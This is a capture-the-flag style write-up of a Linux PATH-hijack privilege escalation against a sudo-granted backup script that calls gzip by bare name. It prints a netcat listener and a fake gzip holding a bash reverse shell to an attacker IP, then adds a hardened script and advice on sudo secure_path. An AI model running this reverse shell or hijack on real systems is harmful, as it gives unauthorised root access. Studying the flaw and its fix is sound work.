Linux command injection privilege escalation
Sep 10, 2021
sudo -l
returns the following:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
View /opt/scripts/access_backup.sh:
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
Elevation of Privilege
The script calls gzip by bare name rather than by absolute path, so the binary is looked up through the PATH of the user invoking sudo. Because the script runs as root, a directory writable by m4lwhere placed first in PATH supplies the gzip that root executes.
On the attacking machine, start a listener:
nc -lnvp 5121
On the target machine, plant a fake gzip, put its directory first in PATH, and run the script through sudo:
cd /tmp
echo "bash -i >& /dev/tcp/10.10.14.42/5121 0>&1" > gzip
chmod 777 gzip
export PATH=/tmp:$PATH
sudo /opt/scripts/access_backup.sh
The listener receives a root shell.
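The fix is on the script side: pin PATH and call gzip by absolute path so the inherited environment cannot change which binary runs. The following is an added example, not the original access_backup.sh and not part of the write-up; it contains a hardened version of the backup step and a small check that reproduces the lookup problem against a scratch directory standing in for /tmp. The location /bin/gzip and the SAFE_PATH value are assumptions for a typical Debian/Ubuntu layout.

```shell
#!/bin/bash
# Added example (not the original access_backup.sh): hardened rewrite of the
# backup step plus a check for the PATH-hijack condition described above.
# Paths and directory names are constructed for illustration.

# Fixed, root-owned search path: the script no longer trusts the PATH it inherits.
readonly SAFE_PATH="/usr/sbin:/usr/bin:/sbin:/bin"

# resolve_cmd NAME PATHVALUE
# Prints the file NAME would execute as under PATHVALUE (empty if not found).
# Runs in a subshell so the caller's PATH and command hash table are untouched.
resolve_cmd() {
    ( PATH="$2"; hash -r 2>/dev/null; command -v "$1" ) 2>/dev/null || true
}

# path_is_hijacked NAME WRITABLE_DIR PATHVALUE
# Returns 0 when NAME would resolve to a file inside WRITABLE_DIR, i.e. the
# lookup is controlled by whoever can write to that directory.
path_is_hijacked() {
    resolved=$(resolve_cmd "$1" "$3")
    case "$resolved" in
        "$2"/*) return 0 ;;
        *)      return 1 ;;
    esac
}

# hardened_backup SRC DEST
# Same job as the original gzip lines, with an explicit PATH and an absolute
# path to gzip (assumed at /bin/gzip) so an inherited PATH cannot change which
# binary runs as root.
hardened_backup() {
    PATH="$SAFE_PATH" /bin/gzip -c "$1" > "$2"
}

# demo: reproduce the condition from the write-up against a scratch directory
# (constructed; stands in for /tmp) and show that the fixed PATH ignores it.
demo() {
    scratch=$(mktemp -d)
    printf '#!/bin/sh\necho "planted gzip ran"\n' > "$scratch/gzip"
    chmod 755 "$scratch/gzip"

    if path_is_hijacked gzip "$scratch" "$scratch:$SAFE_PATH"; then
        echo "inherited PATH: gzip resolves to $scratch/gzip (hijackable)"
    fi
    if ! path_is_hijacked gzip "$scratch" "$SAFE_PATH"; then
        echo "fixed PATH: $scratch is never searched"
    fi
    rm -rf "$scratch"
}

demo
```

A second, independent layer is sudo itself: when sudoers carries `Defaults secure_path`, sudo replaces PATH with that fixed value for the command it runs, which defeats this hijack regardless of how the script is written. The "Matching Defaults entries" section of `sudo -l` output shows whether it is in effect, which is worth checking whenever a script is granted to a user via sudo.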